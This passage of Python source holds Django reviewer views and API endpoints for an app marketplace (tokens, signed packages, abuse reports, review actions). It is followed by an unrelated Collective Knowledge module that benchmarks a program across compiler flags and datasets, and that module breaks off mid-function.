            success = True
        try:
            # Reindent the JSON.
            manifest = json.loads(content)
            content = json.dumps(manifest, indent=4)
        except ValueError:
            # Bug fix: this was a bare ``except``, which also swallowed
            # KeyboardInterrupt/SystemExit. json.loads raises ValueError
            # on invalid JSON; in that case return the content as is.
            pass
    return {
        'content': jinja2.escape(smart_decode(content)),
        'headers': dict((jinja2.escape(k), jinja2.escape(v))
                        for k, v in headers.items()),
        'success': success,
        # Note: We're using `escape_all` on the values here since we know the
        # keys of the nested dict don't come from user input (manifest) and are
        # known safe.
        'permissions': dict((jinja2.escape(k), escape_all(v))
                            for k, v in _get_permissions(manifest).items())
    }
def reviewer_or_token_required(f):
    """Allow access via a one-time ?token=... (responds 200/403) or, absent a
    valid token, via the regular login redirect + Apps:Review check."""
    @functools.wraps(f)
    def wrapper(request, addon, *args, **kw):
        # If there is a 'token' in request.GET we either return 200 or 403.
        # Otherwise we treat it like a normal django view and redirect to a
        # login page or check for Apps:Review permissions.
        token = request.GET.get('token')
        allowed = False
        if token and Token.pop(token, data={'app_id': addon.id}):
            log.info('Token for app:%s was successfully used' % addon.id)
            allowed = True
        elif not token and not request.user.is_authenticated():
            return redirect_for_login(request)
        elif acl.action_allowed(request, 'Apps', 'Review'):
            allowed = True

        if allowed:
            if token:
                log.info('Token provided for app:%s and all was happy'
                         % addon.id)
            else:
                log.info('Apps:Review (no token) all happy for app:%s'
                         % addon.id)
            return f(request, addon, *args, **kw)

        if token:
            log.info('Token provided for app:%s but was not valid'
                     % addon.id)
        else:
            log.info('Apps:Review permissions not met for app:%s'
                     % addon.id)
        raise PermissionDenied
    return wrapper
@app_view
@reviewer_or_token_required
def mini_manifest(request, addon, version_id):
    """Serve the reviewer mini-manifest for one version of a packaged app."""
    token = request.GET.get('token')
    return http.HttpResponse(_mini_manifest(addon, version_id, token),
                             content_type=MANIFEST_CONTENT_TYPE)
def _mini_manifest(addon, version_id, token=None):
    """Build the JSON mini-manifest used to install a packaged app for
    review.

    404s for hosted apps and unknown versions. When `token` is truthy a
    fresh token is minted and appended to the package URL so the package
    endpoint can be fetched without credentials.
    """
    if not addon.is_packaged:
        raise http.Http404

    version = get_object_or_404(addon.versions, pk=version_id)
    file_ = version.all_files[0]
    manifest = addon.get_manifest_json(file_)

    package_path = absolutify(
        reverse('reviewers.signed', args=[addon.app_slug, version.id]))
    if token:
        # Generate a fresh token.
        fresh = Token(data={'app_id': addon.id})
        fresh.save()
        package_path = urlparams(package_path, token=fresh.token)

    data = dict(
        name=manifest['name'],
        version=version.version,
        size=file_.size,
        release_notes=version.releasenotes,
        package_path=package_path,
    )
    # Optional manifest fields are copied through only when present.
    data.update((key, manifest[key])
                for key in ('developer', 'icons', 'locales')
                if key in manifest)
    return json.dumps(data, cls=JSONEncoder)
@permission_required([('Apps', 'ReadAbuse'), ('Apps', 'Review')])
@app_view
def app_abuse(request, addon):
    """List abuse reports filed against an app, newest first."""
    qs = AbuseReport.objects.filter(addon=addon).order_by('-created')
    report_count = qs.count()
    page = paginate(request, qs, count=report_count)
    ctx = context(request, item=addon, reports=page, total=report_count)
    return render(request, 'reviewers/abuse.html', ctx)
@permission_required([('Websites', 'ReadAbuse'), ('Websites', 'Review')])
@website_view
def website_abuse(request, website):
    """List abuse reports filed against a website, newest first."""
    qs = AbuseReport.objects.filter(website=website).order_by('-created')
    report_count = qs.count()
    page = paginate(request, qs, count=report_count)
    ctx = context(request, item=website, reports=page, total=report_count)
    return render(request, 'reviewers/abuse.html', ctx)
@app_view
@reviewer_or_token_required
def get_signed_packaged(request, addon, version_id):
    """Stream the reviewer-signed package for one version of an app.

    404s when the version is unknown or signing produced no package path.
    """
    version = get_object_or_404(addon.versions, pk=version_id)
    # Renamed from `file`, which shadowed the builtin.
    file_ = version.all_files[0]
    path = addon.sign_if_packaged(version.pk, reviewer=True)
    if not path:
        raise http.Http404
    log.info('Returning signed package addon: %s, version: %s, path: %s' %
             (addon.pk, version_id, path))
    # ETag derives from the file hash ('algo:digest' -> digest).
    return HttpResponseSendFile(request, path, content_type='application/zip',
                                etag=file_.hash.split(':')[-1])
@reviewer_required(moderator=True)
def performance(request, email=None):
    """Show review-point totals for a reviewer (month / year / all time).

    Admins may view any reviewer's stats via ?email=...; everyone else may
    only view their own (404 otherwise).
    """
    is_admin = acl.action_allowed(request, 'Admin', '%')

    if email:
        if email == request.user.email:
            user = request.user
        elif is_admin:
            user = get_object_or_404(UserProfile, email=email)
        else:
            raise http.Http404
    else:
        user = request.user

    today = datetime.date.today()
    month_ago = today - datetime.timedelta(days=30)
    year_ago = today - datetime.timedelta(days=365)

    total = ReviewerScore.get_total(user)
    totals = ReviewerScore.get_performance(user)
    months = ReviewerScore.get_performance_since(user, month_ago)
    years = ReviewerScore.get_performance_since(user, year_ago)

    def _sum(scores):
        # Renamed from `iter`, which shadowed the builtin. None counts as 0.
        return sum(s.total or 0 for s in scores)

    performance = {
        'month': _sum(months),
        'year': _sum(years),
        'total': _sum(totals),
    }

    ctx = context(request, **{
        'profile': user,
        'total': total,
        'performance': performance,
    })
    return render(request, 'reviewers/performance.html', ctx)
@reviewer_required(moderator=True)
def leaderboard(request):
    """Render the reviewer leaderboard ordered by score."""
    ctx = context(request, scores=ReviewerScore.all_users_by_score())
    return render(request, 'reviewers/leaderboard.html', ctx)
@reviewer_required
@json_view
def apps_reviewing(request):
    """Render the list of apps currently being looked at by reviewers."""
    ctx = context(request, tab='reviewing',
                  apps=AppsReviewing(request).get_apps())
    return render(request, 'reviewers/apps_reviewing.html', ctx)
@reviewer_required
def attachment(request, attachment):
    """
    Serve an attachment directly to the user.

    Unknown ids and unreadable files yield a 404 response.
    """
    try:
        a = ActivityLogAttachment.objects.get(pk=attachment)
        full_path = os.path.join(settings.REVIEWER_ATTACHMENTS_PATH,
                                 a.filepath)
        # Binary mode: attachments are served as raw downloads and must not
        # go through platform newline translation.
        fsock = open(full_path, 'rb')
    except (ActivityLogAttachment.DoesNotExist, IOError,):
        response = http.HttpResponseNotFound()
    else:
        filename = urllib.quote(a.filename())
        response = http.HttpResponse(fsock,
                                     content_type='application/force-download')
        response['Content-Disposition'] = 'attachment; filename=%s' % filename
        response['Content-Length'] = os.path.getsize(full_path)
    return response
def _retrieve_translation(text, language):
    """Translate `text` into `language` via the Google Translate API.

    Returns (translated_text, response). translated_text is '' when the
    response payload doesn't contain a translation. Network errors are
    logged and re-raised.
    """
    try:
        r = requests.get(
            settings.GOOGLE_TRANSLATE_API_URL, params={
                'key': getattr(settings, 'GOOGLE_API_CREDENTIALS', ''),
                'q': text, 'target': language},
            headers={'User-Agent': settings.MARKETPLACE_USER_AGENT})
    except Exception as e:
        # `except X as e` replaces the legacy comma form (Python 2.6+ / 3).
        log.error(e)
        raise
    try:
        translated = (HTMLParser.HTMLParser().unescape(
            r.json()['data']['translations'][0]['translatedText']))
    except (KeyError, IndexError):
        translated = ''
    return translated, r
@waffle_switch('reviews-translate')
@permission_required([('Apps', 'ModerateReview')])
def review_translate(request, app_slug, review_pk, language):
    """Translate a review's title and body.

    AJAX requests get a JSON payload (status mirrors any failing translate
    call); others are redirected to Google Translate.
    """
    review = get_object_or_404(Review, addon__app_slug=app_slug, pk=review_pk)

    # Strip any region suffix ('pt-BR' -> 'pt').
    if '-' in language:
        language = language.split('-')[0]

    if not request.is_ajax():
        return redirect(settings.GOOGLE_TRANSLATE_REDIRECT_URL.format(
            lang=language, text=review.body))

    title, body, status = '', '', 200
    if review.title is not None:
        title, r = _retrieve_translation(review.title, language)
        if r.status_code != 200:
            status = r.status_code
    if review.body is not None:
        body, r = _retrieve_translation(review.body, language)
        if r.status_code != 200:
            status = r.status_code
    return http.HttpResponse(json.dumps({'title': title, 'body': body}),
                             status=status)
@waffle_switch('reviews-translate')
@permission_required([('Apps', 'ReadAbuse'), ('Websites', 'ReadAbuse')])
def abuse_report_translate(request, report_pk, language, app_slug=None,
                           website_pk=None):
    """Translate an abuse report message (for an app or a website).

    AJAX requests get a JSON payload; others are redirected to Google
    Translate.
    """
    lookup = ({'addon__app_slug': app_slug} if app_slug
              else {'website__id': website_pk})
    report = get_object_or_404(AbuseReport, pk=report_pk, **lookup)

    # Strip any region suffix ('pt-BR' -> 'pt').
    if '-' in language:
        language = language.split('-')[0]

    if request.is_ajax():
        if report.message is not None:
            trans, r = _retrieve_translation(report.message, language)
            return http.HttpResponse(json.dumps({'body': trans}),
                                     status=r.status_code)
    else:
        return redirect(settings.GOOGLE_TRANSLATE_REDIRECT_URL.format(
            lang=language, text=report.message))
class ReviewingView(ListAPIView):
    """API list of the apps currently being viewed by reviewers."""
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication]
    permission_classes = [GroupPermission('Apps', 'Review')]
    serializer_class = ReviewingSerializer
    def get_queryset(self):
        # AppsReviewing tracks which apps reviewers currently have open.
        return [row['app'] for row in AppsReviewing(self.request).get_apps()]
class ReviewersSearchView(SearchView):
    """ES-backed app search restricted to reviewers, with reviewer-specific
    filters and serializer."""
    permission_classes = [GroupPermission('Apps', 'Review')]
    filter_backends = [SearchQueryFilter, ReviewerSearchFormFilter,
                       SortingFilter]
    form_class = ApiReviewersSearchForm
    serializer_class = ReviewersESAppSerializer
class ApproveRegion(SlugOrIdMixin, CreateAPIView):
    """
    API for region-specific app review: POST an ApproveRegionForm payload
    to approve/reject an app pending in the region named in the URL.

    Permission is per-region: Apps:ReviewRegion<REGION-SLUG>.
    """
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    model = Webapp
    slug_field = 'app_slug'
    def get_permissions(self):
        # Derive the permission group from the region in the URL kwargs.
        region = parse_region(self.request.parser_context['kwargs']['region'])
        region_slug = region.slug.upper()
        return (GroupPermission('Apps', 'ReviewRegion%s' % region_slug),)
    def get_queryset(self):
        region = parse_region(self.request.parser_context['kwargs']['region'])
        return self.model.objects.pending_in_region(region)
    def post(self, request, pk, region, *args, **kwargs):
        app = self.get_object()
        region = parse_region(region)
        form = ApproveRegionForm(request.DATA, app=app, region=region)
        if not form.is_valid():
            raise ParseError(dict(form.errors.items()))
        form.save()
        return Response({'approved': bool(form.cleaned_data['approve'])})
class _AppAction(SlugOrIdMixin):
    """Base for app review action endpoints: loads the app, wraps it in a
    ReviewApp handler and dispatches to process_<verb>()."""
    permission_classes = [GroupPermission('Apps', 'Review')]
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    model = Webapp
    slug_field = 'app_slug'
    def _do_post(self, request, pk):
        # Subclasses set `verb` to select the ReviewApp handler method.
        app = self.get_object()
        handler = ReviewApp(request, app, app.latest_version, ())
        handler.set_data(request.DATA)
        return getattr(handler, "process_" + self.verb)()
    def post(self, request, pk, *a, **kw):
        self._do_post(request, pk)
        return Response()
class AppApprove(_AppAction, CreateAPIView):
    """POST: approve an app; responds with the reviewer score awarded."""
    verb = "approve"
    def post(self, request, pk, *a, **kw):
        result = self._do_post(request, pk)
        if result is None:
            # process_approve returned nothing: treated as a conflict.
            return Response(status=409)
        return Response({'score': result})
class AppReject(_AppAction, CreateAPIView):
    """POST: reject an app; responds with the reviewer score awarded."""
    verb = "reject"
    def post(self, request, pk, *a, **kw):
        result = self._do_post(request, pk)
        return Response({'score': result})
class AppInfo(_AppAction, CreateAPIView):
    """POST: request more information from the app's developer."""
    verb = "request_information"
class AppEscalate(_AppAction, CreateAPIView, DestroyAPIView):
    """POST (Apps:Review): escalate an app. DELETE (Apps:Edit): clear the
    escalation."""
    permission_classes = [ByHttpMethod({
        'options': AllowAny,
        'post': GroupPermission('Apps', 'Review'),
        'delete': GroupPermission('Apps', 'Edit'),
    })]
    verb = "escalate"
    def delete(self, request, pk, *a, **kw):
        app = self.get_object()
        handler = ReviewApp(request, app, app.latest_version, ())
        handler.set_data(request.QUERY_PARAMS)
        handler.process_clear_escalation()
        return Response()
class AppDisable(_AppAction, CreateAPIView):
    """POST: disable an app (requires Apps:Edit, not just Review)."""
    permission_classes = [GroupPermission('Apps', 'Edit')]
    verb = "disable"
class AppRereview(_AppAction, DestroyAPIView):
    """DELETE: clear an app from the re-review queue; responds with the
    reviewer score awarded."""
    def delete(self, request, pk, *a, **kw):
        app = self.get_object()
        handler = ReviewApp(request, app, app.latest_version, ())
        handler.set_data(request.QUERY_PARAMS)
        result = handler.process_clear_rereview()
        return Response({'score': result})
class AppReviewerComment(_AppAction, CreateAPIView):
    """POST: attach a reviewer comment to the app's review log."""
    verb = "comment"
class _WebsiteAction(object):
    """Shared auth/permissions/model for website review action endpoints."""
    permission_classes = [GroupPermission('Websites', 'Review')]
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    model = Website
class WebsiteApprove(_WebsiteAction, CreateAPIView):
    """POST: approve a website (sets status to public)."""
    def post(self, request, pk, *a, **kw):
        website = self.get_object()
        website.update(status=mkt.STATUS_PUBLIC)
        return Response()
class WebsiteReject(_WebsiteAction, CreateAPIView):
    """POST: reject a website (sets status to rejected)."""
    def post(self, request, pk, *a, **kw):
        website = self.get_object()
        website.update(status=mkt.STATUS_REJECTED)
        return Response()
class UpdateAdditionalReviewViewSet(SlugOrIdMixin, UpdateAPIView):
    """
    API ViewSet for setting pass/fail of an AdditionalReview. This does not
    follow the DRF convention but instead calls review_passed() or
    review_failed() on the AdditionalReview based on request.DATA['passed'].
    """
    model = AdditionalReview
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    serializer_class = ReviewerAdditionalReviewSerializer
    # TODO: Change this when there is more than just the Tarako queue.
    permission_classes = [GroupPermission('Apps', 'ReviewTarako')]
    def pre_save(self, additional_review):
        # Stamp the acting reviewer and the completion time before saving.
        additional_review.reviewer = self.request.user
        additional_review.review_completed = datetime.datetime.now()
    def post_save(self, additional_review, created):
        # Kick off whatever follow-up work the review outcome requires.
        additional_review.execute_post_review_task()
class AppOwnerPermission(BasePermission):
    """Grant access when request.user is an author of request.DATA['app'];
    missing or unknown app ids pass through so validation can 400."""
    def webapp_exists(self, app_id):
        return Webapp.objects.filter(pk=app_id).exists()
    def user_is_author(self, app_id, user):
        return AddonUser.objects.filter(user=user, addon_id=app_id).exists()
    def has_permission(self, request, view):
        app_id = request.DATA.get('app')
        if not app_id or not self.webapp_exists(app_id):
            # Fall through to a 400 for invalid data.
            return True
        else:
            return self.user_is_author(app_id, request.user)
class CreateAdditionalReviewViewSet(CreateAPIView):
    """
    API ViewSet for requesting an additional review.
    """
    model = AdditionalReview
    serializer_class = AdditionalReviewSerializer
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    # TODO: Change this when there is more than just the Tarako queue.
    permission_classes = [AnyOf(AppOwnerPermission,
                                GroupPermission('Apps', 'Edit'))]

    def app(self, app_id):
        """Load and cache the Webapp for `app_id`.

        Cache under `_app`: the original code assigned to `self.app`, which
        clobbered this method with the Webapp instance after the first call
        (any subsequent `self.app(...)` would raise TypeError).
        """
        self._app = Webapp.objects.get(pk=app_id)
        return self._app
class GenerateToken(SlugOrIdMixin, CreateAPIView):
    """
    This generates a short-lived token to be used by the APK factory service
    for authentication of requests to the reviewer mini-manifest and package.
    """
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    permission_classes = [GroupPermission('Apps', 'Review')]
    model = Webapp
    slug_field = 'app_slug'
    def post(self, request, pk, *args, **kwargs):
        app = self.get_object()
        # The token is bound to this specific app via its data payload.
        token = Token(data={'app_id': app.id})
        token.save()
        log.info('Generated token on app:%s for user:%s' % (
            app.id, request.user.id))
        return Response({'token': token.token})
@never_cache
@json_view
@reviewer_required
def review_viewing(request):
    """Ping endpoint recording which reviewer is looking at an app.

    Returns the current viewer's id/name, whether that's the caller, and
    the ping interval in seconds.
    """
    if 'addon_id' not in request.POST:
        return {}

    addon_id = request.POST['addon_id']
    user_id = request.user.id
    key = '%s:review_viewing:%s' % (settings.CACHE_PREFIX, addon_id)
    interval = mkt.EDITOR_VIEWING_INTERVAL

    # Check who is viewing.
    viewer = cache.get(key)
    if viewer and viewer != user_id:
        # Someone else holds the slot; report who.
        current_name = UserProfile.objects.get(pk=viewer).name
        is_user = 0
    else:
        # Nobody is viewing, or it's already us: (re)claim the slot for
        # twice the ping interval to absorb latency between pings.
        cache.set(key, user_id, interval * 2)
        viewer = user_id
        current_name = request.user.name
        is_user = 1

    AppsReviewing(request).add(addon_id)

    return {'current': viewer, 'current_name': current_name,
            'is_user': is_user, 'interval_seconds': interval}
@never_cache
@json_view
@reviewer_required
def queue_viewing(request):
    """Map each posted addon id to the display name of the other reviewer
    currently viewing it (the caller's own locks are omitted)."""
    if 'addon_ids' not in request.POST:
        return {}

    user_id = request.user.id
    viewing = {}
    for raw_id in request.POST['addon_ids'].split(','):
        addon_id = raw_id.strip()
        cached = cache.get('%s:review_viewing:%s' % (settings.CACHE_PREFIX,
                                                     addon_id))
        if cached and cached != user_id:
            viewing[addon_id] = UserProfile.objects.get(
                id=cached).display_name
    return viewing
class CannedResponseViewSet(CORSMixin, MarketplaceView, viewsets.ModelViewSet):
    """CRUD API for canned review responses (Admin:ReviewerTools only)."""
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    permission_classes = [GroupPermission('Admin', 'ReviewerTools')]
    model = CannedResponse
    serializer_class = CannedResponseSerializer
    cors_allowed_methods = ['get', 'post', 'patch', 'put', 'delete']
class ReviewerScoreViewSet(CORSMixin, MarketplaceView, viewsets.ModelViewSet):
    """CRUD API for manual reviewer score adjustments (Admin:ReviewerTools
    only)."""
    authentication_classes = (RestOAuthAuthentication,
                              RestSharedSecretAuthentication)
    permission_classes = [GroupPermission('Admin', 'ReviewerTools')]
    serializer_class = ReviewerScoreSerializer
    cors_allowed_methods = ['get', 'post', 'patch', 'put', 'delete']
    # mkt.REVIEWED_MANUAL is the default so we don't need to set it on the
    # instance when we are creating a new one, but we do need to set it on
    # queryset to prevent instances with other note_key values from ever being
    # returned.
    queryset = ReviewerScore.objects.filter(note_key=mkt.REVIEWED_MANUAL)
@permission_required([('Apps', 'ModerateReview')])
def moderatelog(request):
    """Display the moderation activity log, filterable by date and action."""
    form = ModerateLogForm(request.GET)
    events = ActivityLog.objects.editor_events()
    if form.is_valid():
        cleaned = form.cleaned_data
        if cleaned['start']:
            events = events.filter(created__gte=cleaned['start'])
        if cleaned['end']:
            events = events.filter(created__lt=cleaned['end'])
        if cleaned['search']:
            events = events.filter(action=cleaned['search'].id)
    pager = paginate(request, events, 50)
    ctx = context(request, form=form, pager=pager, tab='moderatelog')
    return render(request, 'reviewers/moderatelog.html', ctx)
@permission_required([('Apps', 'ModerateReview')])
def moderatelog_detail(request, eventlog_id):
    """Detail page for one moderation event; POST action=undelete restores
    the deleted review (admins, or the moderator who deleted it)."""
    log = get_object_or_404(
        ActivityLog.objects.editor_events(), pk=eventlog_id)
    review = None
    # The second log argument, when present, is the Review acted upon.
    if len(log.arguments) > 1 and isinstance(log.arguments[1], Review):
        review = log.arguments[1]
    form = ModerateLogDetailForm(request.POST or None)
    is_admin = acl.action_allowed(request, 'ReviewerAdminTools', 'View')
    can_undelete = review and review.deleted and (
        is_admin or request.user.pk == log.user.pk)
    if (request.method == 'POST' and form.is_valid() and
            form.cleaned_data['action'] == 'undelete'):
        if not can_undelete:
            if not review:
                raise RuntimeError('Review doesn`t exist.')
            elif not review.deleted:
                raise RuntimeError('Review isn`t deleted.')
            else:
                raise PermissionDenied
        # Undo the moderation points that the original delete awarded.
        ReviewerScore.award_moderation_points(
            log.user, review.addon, review.id, undo=True)
        review.undelete()
        return redirect('reviewers.apps.moderatelog.detail', eventlog_id)
    data = context(request, log=log, form=form, review=review,
                   can_undelete=can_undelete)
    return render(request, 'reviewers/moderatelog_detail.html', data)
| |
#
# Collective Knowledge (Check speedup of program versus various compiler flags and data sets)
#
# See CK LICENSE.txt for licensing details
# See CK COPYRIGHT.txt for copyright details
#
# Developer: Grigori Fursin, Grigori.Fursin@cTuning.org, http://fursin.net
#
# Module-level state: the CK framework injects these when loading the module.
cfg={} # Will be updated by CK (meta description of this module)
work={} # Will be updated by CK (temporal data)
ck=None # Will be updated by CK (initialized CK kernel)
# Local settings
sep='**********************************************************************'
##############################################################################
# Initialize module
def init(i):
    """
    Input:  {} - ignored

    Output: {
              return - always 0 (this module needs no initialization)
            }
    """
    return {'return': 0}
##############################################################################
# describe experiment
def describe(i):
    """
    Print the full experiment description (cfg['full_desc']) via the CK
    kernel.

    Input:  {} - unused

    Output: {
              return       - return code =  0, if successful
                                         >  0, if error
              (error)      - error text if return > 0
            }
    """
    ck.out(cfg['full_desc'])
    return {'return':0}
##############################################################################
# reproduce experiment
def reproduce(i):
    """
    Compile a program with each requested compiler-flag combination, run it
    over the selected datasets, print/export a comparison table, and
    optionally crowdsource detected speedups.

    Input: {
              program_uoa          - program UOA to check
              (cmd_key)            - cmd key
              (dataset_uoas)       - check dataset UOA
              (choices)            - dict['flags'] - list of combinations of compiler flags
              (host_os)            - host OS (detect, if omitted)
              (target_os)          - OS module to check (if omitted, analyze host)
              (device_id)          - device id if remote (such as adb)
              (stat_repeat)        - max statistical repetitions (4 by default)
              (check_speedup)      - if 'yes', check speedups for the first two optimizations ...
              (add_to_pipeline)    - add this dict to pipeline
              (force_record)       - if 'yes', force record even if behavior expected ...
              (experiment_repo_uoa)        - repo to record experiments (by default "remote-ck")
              (experiment_remote_repo_uoa) - if above repo is remote, repo on remote server to record experiments (by default "upload")
              (experiment_uoa)             - CK entry UOA to record experiments (by default "reproduce-ck-paper-filter-optimization")
           }

    Output: {
              return       - return code =  0, if successful
                                         >  0, if error
              (error)      - error text if return > 0
            }
    """
    import os
    # Report files are written next to the current working directory.
    curdir=os.getcwd()
    rf=os.path.join(curdir, cfg['report_file'])
    puoa=i.get('program_uoa','')
    if puoa=='':
        return {'return':1, 'error':'program_uoa is not defined.\n\nUse "ck list program" to see available programs.\nUse "ck pull repo:ck-programs" and "ck pull repo:ck-datasets-min" to get a small set of our benchmarks and datasets.'}
    # Flag combinations come from the caller or from this module's meta.
    choices=i.get('choices',{})
    if len(choices)==0:
        choices=cfg['choices']
    cflags=choices.get('flags',[])
    if len(cflags)==0:
        return {'return':1, 'error':'choices dictionary doesn\'t have "flags" list'}
    ap=i.get('add_to_pipeline',{})
    # Where to record shared experiments (defaults from module meta).
    e_repo_uoa=cfg['repository_to_share_results']
    e_remote_repo_uoa=cfg['remote_repo_uoa']
    e_uoa=cfg['remote_experiment_uoa']
    if i.get('experiment_repo_uoa','')!='': e_repo_uoa=i['experiment_repo_uoa']
    if i.get('experiment_remote_repo_uoa','')!='': e_remote_repo_uoa=i['experiment_remote_repo_uoa']
    if i.get('experiment_uoa','')!='': e_uoa=i['experiment_uoa']
    ###################################################
    # Experiment table
    table=[] # Strings (for printing)
    otable=[] # Original format
    ###################################################
    ck.out(sep)
    ck.out('Loading program meta info ...')
    r=ck.access({'action':'load',
                 'module_uoa':cfg['module_deps']['program'],
                 'data_uoa':puoa})
    if r['return']>0: return r
    pd=r['dict']
    cmd_key=i.get('cmd_key','')
    if cmd_key=='': cmd_key='default'
    ###################################################
    ck.out(sep)
    ck.out('Checking available data sets ...')
    # Either an explicit dataset list or a tag search from the program meta.
    dsets=i.get('dataset_uoas',[])
    dtags=pd.get('run_cmds',{}).get(cmd_key,{}).get('dataset_tags','')
    ii={'action':'search',
        'module_uoa':cfg['module_deps']['dataset']}
    if len(dsets)>0:
        ii['data_uoa_list']=dsets
    else:
        ii['tags']=dtags
    r=ck.access(ii)
    if r['return']>0: return r
    dlist=r['lst']
    # Prepare first and second line of table
    t=[]
    t.append('')
    t.append('')
    t.append('')
    for ds in dlist:
        t.append('Dataset '+ds['data_uoa']+':')
    table.append(t)
    t=[]
    t.append('Optimization:')
    t.append('Binary size:')
    t.append('MD5SUM:')
    for ds in dlist:
        t.append('min time (s); exp time (s); var (%):')
    table.append(t)
    # Number of statistical repetitions
    srepeat=int(i.get('stat_repeat',0))
    if srepeat<1: srepeat=4
    repeat=i.get('repeat',-1)
    hos=i.get('host_os','')
    tos=i.get('target_os','')
    tdid=i.get('device_id','')
    # will be updated later
    deps={}
    features={}
    xchoices={}
    dcomp=''
    # One compile (no_run) per flag combination, then one run per dataset.
    for cf in cflags:
        ck.out(sep)
        ck.out('Checking flags "'+cf+'" ...')
        t=[]
        t.append(cf)
        ii={'action':'run',
            'module_uoa':cfg['module_deps']['pipeline'],
            'data_uoa':cfg['module_deps']['program'],
            'program_uoa':puoa,
            'host_os':hos,
            'target_os':tos,
            'device_id':tdid,
            'flags':cf,
            'repetitions': 1,
            'no_run':'yes',
            'out':'con'}
        if len(ap)>0: ii.update(ap)
        if len(deps)>0: ii['dependencies']=deps
        r=ck.access(ii)
        if r['return']>0: return r
        lio=r.get('last_iteration_output',{})
        fail=lio.get('fail','')
        if fail=='yes':
            return {'return':1, 'error':'compilation failed ('+lio.get('fail_reason','')+')- check above output and possibly report to the authors!'}
        ed=r.get('experiment_desc',{})
        # Reuse resolved dependencies and platform choices for later runs.
        deps=ed.get('dependencies',{})
        cc=ed.get('choices',{})
        if len(xchoices)==0: xchoices=cc
        hos=cc['host_os']
        tos=cc['target_os']
        tdid=cc['device_id']
        ft=ed.get('features',{})
        if len(features)==0: features=ft
        if dcomp=='': dcomp=ft.get('compiler_version',{}).get('str','')
        lsa=r.get('last_stat_analysis',{})
        fresults=lsa.get('dict_flat',{})
        # NOTE(review): this 'os' local rebinds the 'os' module imported
        # above; harmless only because the module isn't used afterwards.
        os=fresults.get('##characteristics#compile#obj_size#min',0)
        md5=fresults.get('##characteristics#compile#obj_size#md5_sum','')
        t.append(os)
        t.append(md5)
        # Iterate over datasets
        oresults={}
        for ds in dlist:
            duoa=ds['data_uoa']
            duid=ds['data_uid']
            ck.out(sep)
            ck.out('Running with dataset '+duoa+' ...')
            ck.out('')
            ij={'action':'run',
                'module_uoa':cfg['module_deps']['pipeline'],
                'data_uoa':cfg['module_deps']['program'],
                'program_uoa':puoa,
                'host_os':hos,
                'target_os':tos,
                'device_id':tdid,
                'repetitions': srepeat,
                'cmd_key':cmd_key,
                'dataset_uoa':duid,
                'no_compile':'yes',
                'out':'con'}
            if len(ap)>0: ij.update(ap)
            if repeat>0: ij['repeat']=repeat
            r=ck.access(ij)
            if r['return']>0: return r
            lio=r.get('last_iteration_output',{})
            fail=lio.get('fail','')
            if fail=='yes':
                return {'return':1, 'error':'execution failed ('+lio.get('fail_reason','')+')- check above output and possibly report to the authors!'}
            state=lio.get('state',{})
            # Keep the calibrated kernel repeat count so later runs (and the
            # speedup normalization below) use the same value.
            repeat=state['repeat']
            lsa=r.get('last_stat_analysis',{})
            fresults=lsa.get('dict_flat',{})
            texp=fresults.get('##characteristics#run#execution_time_kernel_0#exp',0)
            tmin=fresults.get('##characteristics#run#execution_time_kernel_0#min',0)
            tdelta=fresults.get('##characteristics#run#execution_time_kernel_0#range_percent',0)
            oresults[duoa]=fresults
            t.append(' '+('%3.3f' % tmin) + ' ; ' + ('%3.3f' % texp) + ' ; ' + ('%4.1f' % (tdelta*100))+'%')
        otable.append(oresults)
        table.append(t)
    # Draw table
    ii={'action':'draw',
        'module_uoa':cfg['module_deps']['table'],
        'table':table,
        'out':'txt'}
    r=ck.access(ii)
    if r['return']>0: return r
    s=r['string']
    rft=rf+'.txt'
    rfh=rf+'.html'
    # NOTE(review): rfj is computed but never written below.
    rfj=rf+'.json'
    ck.out(sep)
    ck.out('Raw results (exported to '+rf+'.txt, .html, .json):')
    if dcomp!='':
        ck.out('')
        ck.out('Detected compiler version: '+dcomp)
    ck.out('')
    ck.out(s)
    r=ck.save_text_file({'text_file':rft, 'string':s})
    if r['return']>0: return r
    ii['out']='html'
    r=ck.access(ii)
    if r['return']>0: return r
    html=r['string']
    r=ck.save_text_file({'text_file':rfh, 'string':html})
    if r['return']>0: return r
    # Checking if there is a speedup ...
    # Expect that otable[0] - -O3; otable[1] - -O3 -fno-if-conversion
    if i.get('check_speedup','')=='yes' and len(otable)>1:
        r0d0=otable[0][dlist[0]['data_uoa']]
        r0d1=otable[0][dlist[1]['data_uoa']]
        r1d0=otable[1][dlist[0]['data_uoa']]
        r1d1=otable[1][dlist[1]['data_uoa']]
        # Normalize expected times by the kernel repeat count.
        t0d0=r0d0['##characteristics#run#execution_time_kernel_0#exp']/repeat
        t0d1=r0d1['##characteristics#run#execution_time_kernel_0#exp']/repeat
        t1d0=r1d0['##characteristics#run#execution_time_kernel_0#exp']/repeat
        t1d1=r1d1['##characteristics#run#execution_time_kernel_0#exp']/repeat
        sd0=t0d0/t1d0
        sd1=t0d1/t1d1
        # Offer to share when there is more than ~8% speedup or slowdown on
        # either dataset, or when recording is forced.
        if sd0>1.08 or sd1>1.08 or sd0<0.92 or sd1<0.92 or i.get('force_record','')=='yes':
            ck.out(sep)
            ck.out('Found speedup or slow down for the first 2 optimizations:')
            ck.out('')
            ck.out('* Dataset 0 ('+dlist[0]['data_uoa']+') speedup (T_opt0/T_opt1) = '+('%2.2f' % sd0))
            ck.out('* Dataset 1 ('+dlist[1]['data_uoa']+') speedup (T_opt0/T_opt1) = '+('%2.2f' % sd1))
            ck.out('')
            r=ck.inp({'text':'Would you like to share this result with the community and author via public "remote-ck" web service (Y/n): '})
            x=r['string'].lower()
            if x=='' or x=='yes' or x=='y':
                xchoices['optimization_0']=cflags[0]
                xchoices['optimization_1']=cflags[1]
                xchoices['dataset_uoa_0']=dlist[0]['data_uoa']
                xchoices['dataset_uoa_1']=dlist[1]['data_uoa']
                xchoices['dataset_uid_0']=dlist[0]['data_uid']
                xchoices['dataset_uid_1']=dlist[1]['data_uid']
                xchoices['compiler_version']=dcomp
                ii={'action':'add',
